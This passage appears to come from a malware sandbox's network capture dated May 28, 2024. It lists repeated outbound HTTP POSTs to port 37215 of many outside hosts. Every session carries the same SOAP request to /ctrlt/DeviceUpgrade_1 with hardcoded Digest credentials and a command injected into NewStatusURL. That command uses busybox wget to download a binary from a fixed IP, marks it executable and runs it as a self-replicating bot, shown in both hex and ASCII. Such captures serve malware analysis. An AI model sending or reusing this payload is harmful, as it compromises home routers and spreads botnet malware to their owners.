                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1287192.168.2.236042641.242.49.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328689098 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1288192.168.2.233839035.138.150.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328718901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1289192.168.2.2355918197.33.254.1437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328742027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1290192.168.2.2357338126.92.6.2537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328746080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1291192.168.2.234425644.212.186.14837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328775883 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1292192.168.2.235986641.46.84.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328775883 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1293192.168.2.234151841.163.20.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328799009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1294192.168.2.2337072157.152.204.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328814030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1295192.168.2.234744641.140.116.11537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328825951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1296192.168.2.234556641.48.80.10437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328836918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
